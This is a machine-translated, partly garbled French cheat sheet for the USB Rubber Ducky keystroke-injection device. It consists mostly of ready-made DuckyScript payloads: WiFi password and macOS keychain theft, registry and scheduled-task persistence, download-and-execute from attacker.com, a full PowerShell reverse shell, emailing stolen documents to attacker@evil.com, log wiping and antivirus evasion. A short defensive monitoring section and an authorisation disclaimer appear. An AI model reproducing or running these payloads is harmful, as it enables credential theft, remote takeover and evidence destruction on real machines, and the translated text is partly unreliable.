USB Caoutchouc Ducky Outil d'injection de clé Feuille de chaleur¶
Aperçu général¶
Le Ducky en caoutchouc USB est un outil d'injection de frappe déguisé en un lecteur flash générique. Créé par Hak5, il apparaît comme un clavier à l'ordinateur cible et peut exécuter des séquences de frappe préprogrammées à des vitesses superhumaines. Il est couramment utilisé pour les tests de pénétration, les évaluations d'ingénierie sociale et les démonstrations de sécurité.
C'est pas vrai. Attention : Cet outil est destiné uniquement aux tests de pénétration et aux évaluations de sécurité autorisés. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser dans tout environnement.
Aperçu du matériel¶
USB Spécifications pour les canards en caoutchouc¶
- Processeur: processeur 32 bits de 60 MHz
- ** Stockage**: Carte microSD (jusqu'à 32 Go)
- Interface: USB 2.0
- ** Vitesse**: 1000 mots par minute
- Compatibilité: Windows, Mac, Linux, Android
- Power: Bus alimentés par USB
Composantes requises¶
- USB Dispositif en caoutchouc Ducky
- Carte microSD (formatée FAT ou FAT32)
- Ordinateur avec accès Internet pour le développement de la charge utile
- Ordinateur cible avec port USB
Configuration et configuration¶
Configuration initiale¶
# Format MicroSD card
# Windows: Use Disk Management or format command
format F: /FS:FAT32 /Q
# Linux: Use fdisk and mkfs
sudo fdisk /dev/sdX
sudo mkfs.fat -F32 /dev/sdX1
# macOS: Use Disk Utility or diskutil
diskutil eraseDisk FAT32 DUCKY /dev/diskX
Mises à jour du firmware¶
# Download latest firmware from Hak5
# Flash firmware using DFU mode
# Hold button while plugging in to enter DFU mode
# Linux firmware flashing
sudo dfu-util -D firmware.bin
# Windows firmware flashing (use Hak5 Flash tool)
# Follow Hak5 documentation for firmware updates
```_
### Structure du fichier
## Langue de DuckyScript
### Syntaxe de base
```bash
REM This is a comment
DELAY 1000
STRING Hello World
ENTER
Commandes de base¶
| Command | Description | Example |
|---|---|---|
REM |
Comment line | REM This is a comment |
DELAY |
Pause execution (ms) | DELAY 1000 |
STRING |
Type text string | STRING Hello World |
ENTER |
Press Enter key | ENTER |
TAB |
Press Tab key | TAB |
ESCAPE |
Press Escape key | ESCAPE |
SPACE |
Press Space key | SPACE |
REPEAT |
Repeat last command | REPEAT 5 |
Clés de modification¶
| Command | Description |
|---|---|
CTRL or CONTROL |
Control key |
ALT |
Alt key |
SHIFT |
Shift key |
GUI or WINDOWS |
Windows/Cmd key |
MENU or APP |
Menu/Application key |
Combinaisons clés¶
REM Ctrl+C (Copy)
CTRL c
REM Ctrl+Alt+Delete
CTRL ALT DELETE
REM Windows+R (Run dialog)
GUI r
REM Alt+Tab (Switch windows)
ALT TAB
REM Ctrl+Shift+Esc (Task Manager)
CTRL SHIFT ESCAPE
Développement de la charge utile¶
Structure de base de la charge utile¶
REM Author: Security Tester
REM Description: Basic Windows enumeration
REM Target: Windows 10/11
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING whoami && hostname && ipconfig
ENTER
DELAY 2000
STRING exit
ENTER
Charges utiles de Windows¶
Collecte d'informations sur le système¶
REM Windows System Information
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING Get-ComputerInfo|Out-File C:\temp\sysinfo.txt
ENTER
DELAY 2000
STRING Get-Process|Out-File C:\temp\processes.txt -Append
ENTER
DELAY 2000
STRING Get-Service|Out-File C:\temp\services.txt -Append
ENTER
DELAY 2000
STRING exit
ENTER
Reconnaissance du réseau¶
REM Network Information Gathering
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING ipconfig /all > C:\temp\network.txt
ENTER
DELAY 1000
STRING netstat -an >> C:\temp\network.txt
ENTER
DELAY 1000
STRING arp -a >> C:\temp\network.txt
ENTER
DELAY 1000
STRING route print >> C:\temp\network.txt
ENTER
DELAY 1000
STRING exit
ENTER
Récolte crédible¶
REM WiFi Password Extraction
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING netsh wlan show profiles
ENTER
DELAY 2000
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j|findstr -i -v echo|netsh wlan show profiles %j key=clear
ENTER
DELAY 5000
STRING exit
ENTER
Mécanismes de persistance¶
REM Registry Persistence
DELAY 2000
GUI r
DELAY 500
STRING regedit
ENTER
DELAY 2000
CTRL f
DELAY 500
STRING HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ENTER
DELAY 1000
ALT F4
DELAY 500
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\Windows\System32\calc.exe"
ENTER
DELAY 1000
STRING exit
ENTER
macOS Charges utiles¶
Informations sur le système¶
REM macOS System Information
DELAY 2000
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 1000
STRING system_profiler SPHardwareDataType > ~/Desktop/sysinfo.txt
ENTER
DELAY 2000
STRING ps aux >> ~/Desktop/sysinfo.txt
ENTER
DELAY 2000
STRING netstat -an >> ~/Desktop/sysinfo.txt
ENTER
DELAY 2000
STRING exit
ENTER
Accès aux porte-clés¶
REM macOS Keychain Dump
DELAY 2000
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 1000
STRING security dump-keychain -d login.keychain > ~/Desktop/keychain.txt 2>&1
ENTER
DELAY 5000
STRING exit
ENTER
Charges utiles Linux¶
Énumération du système¶
REM Linux System Enumeration
DELAY 2000
CTRL ALT t
DELAY 1000
STRING uname -a > /tmp/sysinfo.txt
ENTER
DELAY 500
STRING cat /etc/passwd >> /tmp/sysinfo.txt
ENTER
DELAY 500
STRING ps aux >> /tmp/sysinfo.txt
ENTER
DELAY 500
STRING netstat -tulpn >> /tmp/sysinfo.txt
ENTER
DELAY 500
STRING exit
ENTER
Escalade des privilèges Vérifier¶
REM Linux Privilege Escalation Check
DELAY 2000
CTRL ALT t
DELAY 1000
STRING sudo -l > /tmp/privesc.txt
ENTER
DELAY 1000
STRING find / -perm -4000 2>/dev/null >> /tmp/privesc.txt
ENTER
DELAY 2000
STRING crontab -l >> /tmp/privesc.txt
ENTER
DELAY 1000
STRING exit
ENTER
Charges utiles avancées¶
Charges utiles multi-étages¶
REM Multi-stage payload with download
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -ExecutionPolicy Bypass
ENTER
DELAY 1000
STRING IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/stage2.ps1')
ENTER
DELAY 5000
STRING exit
ENTER
Charge utile inverse de Shell¶
REM PowerShell Reverse Shell
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%\\\\{0\\\\};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)\\\\{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1|Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()\\\\};$client.Close()
ENTER
Exfiltration des données¶
REM Data Exfiltration via Email
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $files = Get-ChildItem C:\Users\$env:USERNAME\Documents -Recurse -Include *.txt,*.doc,*.pdf|Select-Object -First 10
ENTER
DELAY 1000
STRING foreach($file in $files) \\\\{ $content = Get-Content $file.FullName -Raw; Send-MailMessage -To "attacker@evil.com" -From "victim@company.com" -Subject $file.Name -Body $content -SmtpServer "smtp.company.com" \\\\}
ENTER
DELAY 5000
STRING exit
ENTER
Anti-forensiques¶
REM Clear Event Logs
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING Get-EventLog -List|ForEach-Object \\\\{ Clear-EventLog $_.Log \\\\}
ENTER
DELAY 2000
STRING Remove-Item $env:TEMP\* -Recurse -Force
ENTER
DELAY 2000
STRING exit
ENTER
Compilation des charges utiles¶
Utilisation de DuckEncoder¶
# Download DuckEncoder
git clone https://github.com/hak5darren/USB-Rubber-Ducky.git
cd USB-Rubber-Ducky
# Compile payload
java -jar Encoder/encoder.jar -i payload.txt -o inject.bin
# Alternative online encoder
# Visit: https://ducktoolkit.com/encoder
Utilisation de la boîte à outils Duck¶
# Online compilation at ducktoolkit.com
# 1. Paste DuckyScript code
# 2. Select keyboard layout
# 3. Click "Encode Payload"
# 4. Download inject.bin file
Mise en page des claviers¶
# Common keyboard layouts
us # US English
uk # UK English
de # German
fr # French
es # Spanish
it # Italian
pt # Portuguese
ru # Russian
Stratégies de déploiement¶
Scénarios d'accès physique¶
REM Quick deployment (30 seconds)
DELAY 2000
GUI r
DELAY 500
STRING cmd /c "powershell IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/payload')"
ENTER
Intégration du génie social¶
REM Disguised as software update
DELAY 3000
GUI r
DELAY 500
STRING notepad
ENTER
DELAY 1000
STRING Dear User,
ENTER
STRING
ENTER
STRING A critical security update is being installed.
ENTER
STRING Please do not remove this device until complete.
ENTER
STRING
ENTER
STRING Estimated time: 2-3 minutes
ENTER
DELAY 2000
ALT F4
DELAY 500
REM Execute actual payload here
Persistance Charges utiles¶
REM Scheduled Task Persistence
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING schtasks /create /tn "SecurityUpdate" /tr "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Windows\Temp\update.ps1" /sc daily /st 09:00
ENTER
DELAY 1000
STRING exit
ENTER
Techniques d'évacuation¶
Évasion anti-Virus¶
REM Obfuscated PowerShell
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -EncodedCommand <base64_encoded_command>
ENTER
Évasion basée sur le calendrier¶
REM Random delays to avoid detection
DELAY 3000
GUI r
DELAY 800
STRING cmd
ENTER
DELAY 1200
STRING echo "Normal user activity"
ENTER
DELAY 2500
REM Execute payload with human-like timing
Cacher les processus¶
REM Hide PowerShell window
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -NoProfile -NonInteractive
ENTER
DELAY 1000
STRING Start-Process powershell -ArgumentList "-WindowStyle Hidden -Command 'Your-Command-Here'" -WindowStyle Hidden
ENTER
Mesures défensives et détection¶
USB Surveillance des appareils¶
# Monitor USB device insertions
Get-WinEvent -FilterHashtable @\\\\{LogName='System'; ID=20001,20003\\\\}|
Where-Object \\\\{$_.Message -like "*USB*"\\\\}
# Registry monitoring for USB devices
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR\*\*"|
Select-Object FriendlyName, Mfg, Service
Détection d'injection de frappe¶
# Monitor for rapid keystroke patterns
# Look for superhuman typing speeds in logs
Get-WinEvent -FilterHashtable @\\\\{LogName='Security'; ID=4648,4624\\\\}|
Where-Object \\\\{$_.TimeCreated -gt (Get-Date).AddMinutes(-5)\\\\}
# Monitor for suspicious command patterns
Get-WinEvent -FilterHashtable @\\\\{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104\\\\}|
Where-Object \\\\{$_.Message -like "*DownloadString*" -or $_.Message -like "*IEX*"\\\\}
USB Restrictions portuaires¶
REM Disable USB storage devices via Group Policy
REM Computer Configuration > Administrative Templates > System > Removable Storage Access
REM Registry method to disable USB storage
reg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 4 /f
Contre-mesures¶
Protection du point d'extrémité¶
# Enable PowerShell logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1
# Enable command line auditing
auditpol /set /subcategory:"Process Creation" /success:enable
# Monitor for suspicious processes
Get-Process|Where-Object \\\\{$_.ProcessName -like "*powershell*" -and $_.MainWindowTitle -eq ""\\\\}
Surveillance des réseaux¶
# Monitor for suspicious network connections
netstat -an|grep ESTABLISHED|grep -E "(4444|8080|443)"
# DNS monitoring for suspicious domains
# Monitor DNS logs for newly registered domains or suspicious TLDs
Éducation des utilisateurs¶
Key indicators of USB Rubber Ducky attacks:
1. Unexpected keyboard activity
2. Rapid text entry beyond human capability
3. Command prompts appearing automatically
4. Suspicious network activity after USB insertion
5. New scheduled tasks or startup programs
Techniques avancées¶
Chaîne de charge utile¶
REM Stage 1: Initial access
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING Invoke-WebRequest -Uri "http://attacker.com/stage2.txt" -OutFile "$env:TEMP\s2.txt"
ENTER
DELAY 3000
STRING Get-Content "$env:TEMP\s2.txt"|Invoke-Expression
ENTER
DELAY 1000
STRING exit
ENTER
Détection de l'environnement¶
REM Detect virtualized environment
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING if ((Get-WmiObject -Class Win32_ComputerSystem).Model -notlike "*Virtual*") \\\\{ Your-Payload-Here \\\\}
ENTER
DELAY 2000
STRING exit
ENTER
Exécution conditionnelle¶
REM Execute only on specific OS version
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING if ([Environment]::OSVersion.Version.Major -eq 10) \\\\{ Your-Windows10-Payload \\\\}
ENTER
DELAY 2000
STRING exit
ENTER
Dépannage¶
Questions communes¶
Issue: Payload not executing
Solution: Check keyboard layout, verify inject.bin file
Issue: Commands typing incorrectly
Solution: Verify keyboard layout matches target system
Issue: Timing issues
Solution: Increase DELAY values for slower systems
Issue: Antivirus detection
Solution: Use obfuscation techniques, test on similar AV
Débogage des charges utiles¶
REM Debug payload with visible output
DELAY 2000
GUI r
DELAY 500
STRING notepad
ENTER
DELAY 1000
STRING Payload executed successfully
ENTER
STRING Current user:
STRING %USERNAME%
ENTER
STRING Current time:
STRING %TIME%
ENTER
Environnement d'essai¶
# Set up isolated testing environment
# Use virtual machines for payload development
# Test on multiple OS versions and configurations
# Verify payload behavior before deployment
Considérations juridiques et éthiques¶
Utilisation autorisée seulement¶
- Obtenir une autorisation écrite avant l'essai
- Utiliser uniquement dans les environnements contrôlés
- Documenter toutes les activités d'essai
- Suivre les pratiques de divulgation responsable
Exigences de conformité¶
- Assurer le respect des lois locales
- Suivre les politiques de sécurité organisationnelles
- Maintenir la chaîne de garde pour les preuves
- Protéger les informations sensibles découvertes
Ressources¶
- [Ducky en caoutchouc USB Hak5] (LINK_5)
- [Documentation de DuckyScript] (LINK_5)
- [Boîte à outils ducon] (LINK_5)
- [Répertoire de la charge utile] (LINK_5)
- [Forums Hak5] (LINK_5)
*Cette feuille de triche fournit une référence complète pour l'utilisation du Ducky en caoutchouc USB. Assurez-vous toujours d'avoir une autorisation appropriée avant d'effectuer des évaluations de sécurité physique. *